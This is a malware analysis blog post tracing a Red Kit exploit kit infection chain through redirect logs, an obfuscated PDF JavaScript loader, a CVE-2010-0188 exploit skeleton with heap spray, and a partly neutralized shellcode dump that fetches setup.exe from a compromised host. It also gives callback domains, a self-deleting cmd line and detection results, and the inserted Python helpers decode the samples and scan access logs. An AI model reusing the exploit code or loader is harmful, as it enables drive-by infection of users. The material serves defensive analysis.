supportservice060.ru/flow2.php (thanks to @MalwareSigs for the tips) is how the adventure began, and it went to the landing page below:
*) For reference, here is our previous Red Kit analysis -->>[HERE]
OK. Here's the story:
First of all, the route of this case's infection scheme is as follows:

#MalwareMustDie
Infector Page (flow2.php) 91.243.115.140 supportservice078.ru
Infector "Ticket" confirmator (/vd/5;b068d006acd6b9e6e371e501d35be2a7) 46.166.169.238 gzqxj.portrelay.com
TDS Redirector page (/tds/in.cgi?9) 91.243.115.140 supportservice078.ru
RedKit Redirector & Landing pages (hiqy.html) 81.169.145.163 schloss-beratung.de // 302 to other landing page
74.53.109.128 windermerecottage.co.uk // the landing page + payload

*) PS: Better watch the IPs, domains & DNS used by this↑ infector scheme!

It is not like Blackhole: Red Kit uses a proper confirmation scheme and a TDS redirector for every access that arrives. The infector page, ticket confirmator and TDS are a set of barricades. Behind those, the Red Kit hosts look like they can be set up to forward the infection from one host to another in a round-robin scheme via HTTP 302. Let's look at the following log detail carefully as PoC. We access the infector URL:

--02:24:22-- h00p://supportservice060.ru/flow2.php
Resolving supportservice060.ru... seconds 0.00, 91.243.115.140
Caching supportservice060.ru => 91.243.115.140
Connecting to supportservice060.ru|91.243.115.140|:80... seconds 0.00, connected.
GET /flow2.php HTTP/1.0
Accept: */*
Host: supportservice060.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 13:27:04 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
Length: 91 [text/html]
02:24:25 (1.55 MB/s) - `flow2.php' saved [91/91]

The inside contains:

<iframe src="h00p://supportservice078.ru/tds/in.cgi?default" height="3" width="3">

So we fetched it further; it turns out to be a long way to go before we get to the downloads..

--02:27:23-- h00p://supportservice078.ru/tds/in.cgi?default
Resolving supportservice078.ru... seconds 0.00, 91.243.115.140
Caching supportservice078.ru => 91.243.115.140
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
GET /tds/in.cgi?default HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
Host: supportservice078.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:02 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
302 Found
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 [following]
--02:27:24-- h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 => `5'
Resolving gzqxj.portrelay.com... seconds 0.00, 46.166.169.238
Caching gzqxj.portrelay.com => 46.166.169.238
Connecting to gzqxj.portrelay.com|46.166.169.238|:80... seconds 0.00, connected.
GET /vd/5;b068d006acd6b9e6e371e501d35be2a7 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: gzqxj.portrelay.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 11 Jan 2013 19:29:36 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.20
Location: h00p://supportservice078.ru/tds/in.cgi?9
Vary: Accept-Encoding,User-Agent
302 Found
Location: h00p://supportservice078.ru/tds/in.cgi?9 [following]
Skipping 0 bytes of body: [] done.
--02:27:25-- h00p://supportservice078.ru/tds/in.cgi?9 => `in.cgi@9'
conaddr is: 46.166.169.238
Found supportservice078.ru in host_name_addresses_map (003D52C8)
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
GET /tds/in.cgi?9 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: supportservice078.ru
Connection: Keep-Alive
Cookie: TSUSER=vdelecc; vbpnx10=_1_; vbpnxdefault=_10_; vbpnxvdelecc=_1_
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:03 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://schloss-beratung.de/hiqy.html
302 Found
Location: h00p://schloss-beratung.de/hiqy.html [following]
--02:27:25-- h00p://schloss-beratung.de/hiqy.html => `hiqy.html'
conaddr is: 46.166.169.238
Resolving schloss-beratung.de... seconds 0.00, 81.169.145.163
Caching schloss-beratung.de => 81.169.145.163
Found schloss-beratung.de in host_name_addresses_map (003D6640)
Connecting to schloss-beratung.de|81.169.145.163|:80... seconds 0.00, connected.
GET /hiqy.html HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: schloss-beratung.de
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 302 Moved Temporarily
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Set-Cookie: d3e4aec0be51dc536dfa324cc2df3903=1927452e1f33f00606657af59fa38408; expires=Fri, 18-Jan-2013 17:27:18 GMT; path=/
Location: h00p://windermerecottage.co.uk/hiqy.htm
Connection: close
Content-Type: text/html
302 Moved Temporarily
Location: h00p://windermerecottage.co.uk/hiqy.htm [following]
--02:27:26-- h00p://windermerecottage.co.uk/hiqy.htm => `hiqy.htm'
conaddr is: 46.166.169.238
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Found windermerecottage.co.uk in host_name_addresses_map (003D6B10)
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /hiqy.htm HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: windermerecottage.co.uk
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache
Content-Length: 13283
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 13,283 (13K) [text/html]
02:27:27 (2.93 MB/s) - `hiqy.htm' saved [13283/13283]

This hiqy.htm is a landing page script with 2 jars + 1 PDF infector. To get to hiqy.htm, we must first get through the gate at

↓supportservice078.ru/tds/in.cgi?9↑

whose script, together with the access parameter we used, is the key to which infector we will be forwarded to.

The landing page source: you'll see the neutralized landing page code here -->>[PASTEBIN]
For analysis I break down the code here -->>[PASTEBIN]

The landing page has the jar download URLs below:

windermerecottage.co.uk/332.jar
windermerecottage.co.uk/887.jar

but I can't grab them; bumped into a 404. Log:

GET /332.jar HTTP/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
HTTP/1.1 404 Not Found
Date: Fri, 11 Jan 2013 17:45:57 GMT

There's a RedKit reference ->>[HERE] that explains the way to fetch the jars by the direct link to 33.html and 41.html, the URLs the jars download from, but this didn't work well & returned a zero-byte file; I guess the params are unmatched. PoC:

Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /62.html HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2013 08:34:35 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 0 [text/html]
17:34:44 (0.00 B/s) - `62.html' saved [0/0]

BUT! There's also a PDF URL, which I just downloaded right away :-)

--02:47:09-- h00p://windermerecottage.co.uk/987.pdf
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /987.pdf HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie is Sleepy
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:47:01 GMT
Server: Apache
Content-Disposition: inline; filename=5c6bcd22.pdf
Content-Length: 6418
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/pdf
200 OK
Length: 6,418 (6.3K) [application/pdf]
02:47:10 (126.64 MB/s) - `987.pdf' saved [6418/6418]

There is JavaScript like the below in the PDF at 0xB1D-0x185C:

drols1 = event;
gerpsoi= "/*dbgbgfgd dswd*/CHoedsp0DCHoedsp0ACHoedsp76CHoe edsp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoedsp2 20CHoedsp5FCHoedsp6BCHoedsp5FCHoedsp6DCHoedsp28CHoedsp29CHo oedsp71CHoedsp56CHoedsp29CHoedsp0DCHoedsp0ACHoedsp7BCHoedsp p71CHoedsp56CHoedsp29CHoedsp3BCHoedsp0DCHoedsp0ACHoedsp72CH Hoedsp7BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp61CHoedsp72CHoeds sp3BCHoedsp0DCHoedsp0ACHoedsp76CHoedsp65CHoedsp72CHoedsp20C CHoedsp6ECHoedsp67CHoedsp74CHoedsp68CHoedsp20CHoedsp3CCHoed dsp28CHoedsp76CHoedsp65CHoedsp72CHoedsp2CCHoedsp20CHoedsp31 2CHoedsp6CCHoedsp6FCHoedsp63CHoedsp6BCHoedsp28CHoedsp78CHoe edsp20CHoedsp32CHoedsp20CHoedsp3CCHoedsp20CHoedsp6CCHoedsp6 : : ..Hoedsp7DCHoedsp0DCHoedsp0A";
drols=drols1.target.creator;
function tplax(search, replace, subject) {
    return subject.split(search).join(replace);
}
function botoe(frodola,fiiio) {
    valueOf[cmfi](frodola);
    valueOf[cmfi](Midias);
}
var dsprpa = "i%ppd";
var cmfi = "e"+ drols1.target.author.toLowerCase().split("").reverse().join("");
ery= tplax("Anila/VCa;",'',drols);
botoe(ery,12);
var xchdfjh;

The PDF's evil JavaScript source.
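As an added example, not the post's code and not the PDF's own decoder (which the post does not show), here is a Python re-implementation of the three string tricks visible in the snippet above: the `CHoedsp` + two-hex-digit byte encoding of `gerpsoi` (an inference from the dump, where `0D 0A 76 61 72 20` spells "\r\nvar "), the `eval` name built from the reversed, lower-cased /Author field, and the `tplax()` marker removal on /Creator. The field values used below are constructed; the real PDF's metadata is not on the page.

```python
"""Re-implementation (Python) of the string tricks in the PDF's JavaScript.
Sample inputs are constructed for this example; the real PDF's /Author and
/Creator values are not on the page."""
import re

SEP = "CHoedsp"                                  # token that precedes every encoded byte
JUNK_COMMENT = re.compile(r"/\*.*?\*/", re.S)    # the leading /*dbgbgfgd dswd*/ filler
HEX_BYTE = re.compile(r"[0-9A-Fa-f]{2}")


def decode_gerpsoi(blob: str) -> str:
    """Turn 'CHoedsp' + XX tokens into bytes.  Assumption (inferred from the
    dump, not shown by the sample's own code): 0D 0A 76 61 72 20 -> "\\r\\nvar "."""
    body = JUNK_COMMENT.sub("", blob)
    out = bytearray()
    for tok in body.split(SEP):
        if tok == "":
            continue                             # empty piece before the first SEP
        if not HEX_BYTE.fullmatch(tok):
            raise ValueError(f"unexpected token {tok!r}")
        out.append(int(tok, 16))
    return out.decode("latin-1")


def eval_name(author_field: str) -> str:
    """Mirror of: "e" + author.toLowerCase().split("").reverse().join("")."""
    return "e" + author_field.lower()[::-1]


def tplax(search: str, replace: str, subject: str) -> str:
    """Port of the sample's tplax(): subject.split(search).join(replace)."""
    return replace.join(subject.split(search))


def recover_stage2(gerpsoi: str, author: str, creator: str) -> dict:
    """What botoe() would hand to valueOf[cmfi](): the function name it
    resolves to and the script strings it would run."""
    return {
        "cmfi": eval_name(author),
        "ery": tplax("Anila/VCa;", "", creator),  # marker stripped from /Creator
        "gerpsoi_decoded": decode_gerpsoi(gerpsoi),
    }


def encode_gerpsoi(text: str) -> str:
    """Inverse of decode_gerpsoi(); used only to build the constructed sample."""
    return "".join(f"{SEP}{b:02X}" for b in text.encode("latin-1"))


# Constructed sample: what the three fields could look like under this scheme.
STAGE2 = "\r\nvar _k_m = 1;\r\n"
SAMPLE_GERPSOI = "/*dbgbgfgd dswd*/" + encode_gerpsoi(STAGE2)
SAMPLE_AUTHOR = "lAv"                            # "e" + reverse(lower) -> "eval"
SAMPLE_CREATOR = "funAnila/VCa;ction splAnila/VCa;aui(){}"

if __name__ == "__main__":
    for k, v in recover_stage2(SAMPLE_GERPSOI, SAMPLE_AUTHOR, SAMPLE_CREATOR).items():
        print(f"{k}: {v!r}")
```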
Here's the evil code (neutralized) -->>[PASTEBIN]
I use this code to get the payload by simply simulating it ->>[PASTEBIN]

There's an exploit for CVE-2010-0188 in the decoded code, for the shellcode execution, with the structure below:

splaui();
function splaui(){
    var ver = get_ver();
    if (ver >= 0x1f40){
        // Exploit CVE-2010-0188
        var tiff = 'SUkqADggAABB'; // LibTiff integer aimed for overflow
        var nops = make_str('QUFB', 0x2ae8);
        var start = ' QQï½AAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
        var foot = '';
        var sc_hex = '';
        if (ver < 0x2009){ // determining the Adobe version before the exploit..
            foot = 'o+uASjgggï½puL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
            sc_hex = '4c206..000'; // shellcode
        } else {
            foot = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
            sc_hex = '4c206..000'; // shellcode
        }
        if (foot.length){
            var ret = [tiff, nops, start, foot].join('');
            var sc_str = hex2str(sc_hex);
            var scode = str2uni(sc_str);
            heap_spray3(scode);
            rVBGo.rawValue = ret;
        }
    }
}

And the shellcode is the neutralized code below:

4c 2O 6O Of O5 17 8O 4a 3c 2O 6O Of Of 63 8O 4a  L.`....J<.`..c.J
a3 eb 8O 4a 3O 2O 82 4a 6e 2f 8O 4a 41 41 41 41  ...JO..Jn/.JAAAA
26 OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO  &...............
12 39 8O 4a 64 2O 6O Of OO O4 OO OO 41 41 41 41  .9.Jd.`.....AAAA
41 41 41 41 66 83 e4 fc fc 85 e4 75 34 e9 5f 33  AAAAf......u4._3
cO 64 8b 4O 3O 8b 4O Oc 8b 7O 1c 56 8b 76 O8 33  .d.@O.@..p.V.v.3
db 66 8b 5e 3c O3 74 33 2c 81 ee 15 1O ff ff b8  .f.^<.t3,.......
8b 4O 3O c3 46 39 O6 75 fb 87 34 24 85 e4 75 51  .@O.F9.u..4$..uQ
e9 eb 4c 51 56 8b 75 3c 8b 74 35 78 O3 f5 56 8b  ..LQV.u<.t5x..V.
76 2O O3 f5 33 c9 49 41 fc ad O3 c5 33 db Of be  v...3.IA....3...
< C U T >
44 24 O8 2O 2d 73 2O 53 68 f8 OO OO OO ff 56 Oc  D$..-s.Sh.....V.
8b e8 33 c9 51 c7 44 1d OO 77 7O 62 74 c7 44 1d  ..3.Q.D..wpbt.D.
O5 2e 64 6c 6c c6 44 1d O9 OO 59 8a c1 O4 3O 88  ..dll.D...Y...O.
44 1d O4 41 51 6a OO 6a OO 53 57 6a OO ff 56 14  D..AQj.j.SWj..V.
85 cO 75 16 6a OO 53 ff 56 O4 6a OO 83 eb Oc 53  ..u.j.S.V.j....S
ff 56 O4 83 c3 Oc eb O2 eb 13 47 8O 3f OO 75 fa  .V........G.?.u.
47 8O 3f OO 75 c4 6a OO 6a fe ff 56 O8 e8 9c fe  G.?.u.j.j..V....
ff ff 8e 4e Oe ec 98 fe 8a Oe 89 6f O1 bd 33 ca  ...N.......o..3.
8a 5b 1b c6 46 79 36 1a 2f 7O 68 74 74 7O 3a 2f  .[..Fy6./phttp:/
2f 77 69 6e 64 65 72 6d 65 72 65 63 6f 74 74 61  /windermerecotta
67 65 2e 63 6f 2e 75 6b 2f 36 32 2e 68 74 6d 6c  ge.co.uk/62.html
OO OO                                            ..

And you can see the un-obfuscated URL for the payload at the end of the shellcode:

h00p://windermerecottage.co.uk/62.html

If you fetch it you'll get the binary malware setup.exe:

GET /62.html HTTP/1.0
Host: windermerecottage.co.uk
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:58:41 GMT
Server: Apache
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe <====
Content-Length: 42496
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/octet-stream
200 OK
Length: 42,496 (42K) [application/octet-stream]
02:58:51 (128.68 KB/s) - `62.html' saved [42496/42496]

It looks like this:

Sections:
.code   0x1000  0x21f0   8704
.text   0x4000  0x41b4  16896
.rdata  0x9000  0x13c     512
.data   0xa000  0xd04    2560
.rsrc   0xb000  0x319c  12800
Compilation timedatestamp.....: 2013-01-11 15:44:17
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001000
packer: PureBasic 4.x -> Neil Hodgson - additional
PureBasic 4.x -> Neil Hodgson
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00  ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0080 50 45 00 00 4C 01 05 00 51 33 F0 50 00 00 00 00  PE..L...Q3.P....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 64 00 00  ...........2.d..
00A0 00 42 00 00 00 00 00 00 00 10 00 00 00 10 00 00  .B..............
00B0 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00  ......@.........
: : :

After unpacking the binary, I found the CMD command below:

cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del %s

↑for the self-deletion purpose. And the complete strings are here -->>[PASTEBIN]

If we execute this malware, we'll see setup.exe inject itself into a process:

And it starts making DNS calls to the hosts below:

cash.taxi-soyuz.ru IN A +
orderindiantoronto.com IN A +
craportuense.com IN A +
stevenyang.ca IN A +
goediving.com IN A +
triathlonclub.sakura.ne.jp IN A +
ouedknouz.com IN A +
basement-gallery.com IN A +
boersenkeller-frankfurt.de IN A +
ex9.com.br IN A +

You can see the snapshot of the process' network activity:

With more detailed PoC in Wireshark:

And it starts making HTTP GET requests to the URLs below:

h00p://basement-gallery.com/h.htm
h00p://craportuense.com/i.htm
h00p://ouedknouz.com/c.htm
h00p://stevenyang.ca/p.htm
h00p://orderindiantoronto.com/k.htm
h00p://goediving.com/g.htm
h00p://ex9.com.br/t.htm
h00p://boersenkeller-frankfurt.de/w.htm
h00p://cash.taxi-soyuz.ru/l.htm
h00p://triathlonclub.sakura.ne.jp/o.htm

PoC: actually these requests were so rapid & fast that in 3 minutes there were 16,000+ requests:

Not all the requests succeed in reaching the mothership, PoC:

--04:07:17-- h00p://triathlonclub.sakura.ne.jp/o.htm
Resolving triathlonclub.sakura.ne.jp... 59.106.27.164
Connecting to triathlonclub.sakura.ne.jp|59.106.27.164|:80... connected.
HTTP request sent, awaiting response...
404 Not Found
04:07:18 ERROR 404: Not Found.
--04:07:57-- h00p://boersenkeller-frankfurt.de/w.htm
Resolving boersenkeller-frankfurt.de... 81.28.232.71
Connecting to boersenkeller-frankfurt.de|81.28.232.71|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:07:59 ERROR 404: Not Found.
--04:08:43-- h00p://orderindiantoronto.com/k.htm
Resolving orderindiantoronto.com... 174.132.192.130
Connecting to orderindiantoronto.com|174.132.192.130|:80... connected.
HTTP request sent, awaiting response... 500 Internal Server Error
04:08:44 ERROR 500: Internal Server Error.
--04:09:17-- h00p://ex9.com.br/t.htm
Resolving ex9.com.br... 200.98.246.160
Connecting to ex9.com.br|200.98.246.160|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:09:19 (0.00 B/s) - `t.htm' saved [0/0]
--04:09:44-- h00p://stevenyang.ca/p.htm
Resolving stevenyang.ca... 216.187.92.109
Connecting to stevenyang.ca|216.187.92.109|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:09:45 ERROR 404: Not Found.
--04:10:11-- h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:10:12 ERROR 404: Not Found.
--04:11:05-- h00p://ouedknouz.com/c.htm
Resolving ouedknouz.com... 213.186.33.3
Connecting to ouedknouz.com|213.186.33.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:06 (0.00 B/s) - `c.htm' saved [0/0]
--04:11:30-- h00p://goediving.com/g.htm
Resolving goediving.com... 72.167.232.31
Connecting to goediving.com|72.167.232.31|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:11:31 (0.00 B/s) - `g.htm' saved [0/0]
--04:12:23-- h00p://craportuense.com/i.htm
Resolving craportuense.com... 94.127.190.21
Connecting to craportuense.com|94.127.190.21|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
04:12:25 (0.00 B/s) - `i.htm' saved [0/0]
--04:12:49-- h00p://cash.taxi-soyuz.ru/l.htm
Resolving cash.taxi-soyuz.ru... 217.16.21.192
Connecting to cash.taxi-soyuz.ru|217.16.21.192|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
04:12:49 ERROR 404: Not Found.

↑These domains serving the htm files are actually compromised servers on which the RedKit responder has been implemented. Additionally, all of the requests use the fake user agent below:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)

↑This is important for the compromised servers above when checking their access logs. BTW, one of the callback hosts has exceeded its HTTP traffic quota ;-))

We can't see any significant registry changes or other dropped files beyond the operations mentioned above. Furthermore, the malware process suddenly stops/exits without errors. The previous case [HERE] also shows the same payload at the first infection. So it is in the nature of the RedKit pack to download more malware through the first payload. But this time all callback hosts look unavailable to serve :-) I still wonder WHAT IF the callbacks had successfully returned a response..
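As an added example, not part of the original post, here is a Python check that applies the two signals above (the fixed User-Agent string and the one-letter .htm callback path) to Apache combined-format access log lines; the log lines are constructed for this example, while the UA and path shape are the ones this post quotes.

```python
"""Access-log check for the callback pattern described above: the fixed
User-Agent string the payload sends and the one-letter ".htm" paths it
requests from the compromised hosts.  Log lines are constructed for this
example (Apache "combined" format); the UA and path shapes come from the post."""
import re
from collections import Counter
from typing import Dict, List

# The exact UA quoted in the post for every callback.
REDKIT_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"

# Callback paths in the post: /h.htm, /i.htm, /c.htm ... one letter at the web root.
CALLBACK_PATH = re.compile(r"^/[a-z]\.htm$")

# Apache combined log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str) -> Dict[str, str]:
    m = COMBINED.match(line)
    if not m:
        raise ValueError(f"not a combined-format line: {line!r}")
    return m.groupdict()


def is_redkit_callback(rec: Dict[str, str]) -> bool:
    """Require both signals: the UA by itself is a plausible IE 9 string and
    would flag real browsers; the path shape by itself is weak as well."""
    return rec["ua"] == REDKIT_UA and CALLBACK_PATH.match(rec["path"]) is not None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    return [rec for rec in (parse_line(l) for l in lines if l.strip())
            if is_redkit_callback(rec)]


def per_client(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Callback requests per source IP; the post saw 16,000+ in three minutes
    from one infected host, so a high count from one client is the tell."""
    return dict(Counter(rec["ip"] for rec in hits))


# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jan/2013:17:58:41 +0000] "GET /h.htm HTTP/1.1" 200 0 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"',
    '192.0.2.10 - - [11/Jan/2013:17:58:42 +0000] "GET /c.htm HTTP/1.1" 404 213 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"',
    # Same UA but an ordinary page: a browser (real or spoofed), not a callback.
    '198.51.100.7 - - [11/Jan/2013:17:59:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)"',
    # Callback-shaped path but a different client string: not this payload.
    '203.0.113.5 - - [11/Jan/2013:17:59:30 +0000] "GET /h.htm HTTP/1.1" 200 0 "-" "curl/7.26.0"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    print(f"{len(hits)} callback request(s); per client: {per_client(hits)}")
```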
Virus Total checks currently show only 5 antivirus engines initially detecting this first payload as malware:

SHA1: 7672f68845b3e43be76eb21559ae0f8e02407e6f
MD5: 92899c20da4d9db5627af89998aadc58
File size: 41.5 KB ( 42496 bytes )
File name: setup.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 5 / 46
Analysis date: 2013-01-11 19:15:32 UTC ( 2 hours, 48 minutes ago )
URL --->>[VirusTotal]

Malware names:
Fortinet : W32/Zbot.ANM!tr
Malwarebytes : Trojan.Bublik
ByteHero : Virus.Win32.Heur.c
Kaspersky : UDS:DangerousObject.Multi.Generic
Ikarus : Trojan-Downloader.Win32.Karagany

Here's the full sample of this infection:
Samples can be downloaded here -->>[MEDIAFIRE]
PCAP & Regshot data can be downloaded here -->>[MEDIAFIRE]
Detection rates are as follows (click the front numbers for the link)

There is a huge recent infection of Red Kit, which can be found below, as announced by our fellow crusader (thanks to @Set_Abominae):

Recent Redkit #Exploit-Kit URL and IPs: pastebin.com/7gvT440u #malwaremustdie #malware
— Set Abominae (@Set_Abominae) January 11, 2013

*) [NEW] CURRENT UrlQuery Link for RedKit -->>[HERE]

@hulk_crusader @malwaremustdie RedKit: 332.jar -> 33.html (java 6). 887.jar -> 41.html (java 7). 987.pdf -> 62.html
— Set Abominae (@Set_Abominae) January 26, 2013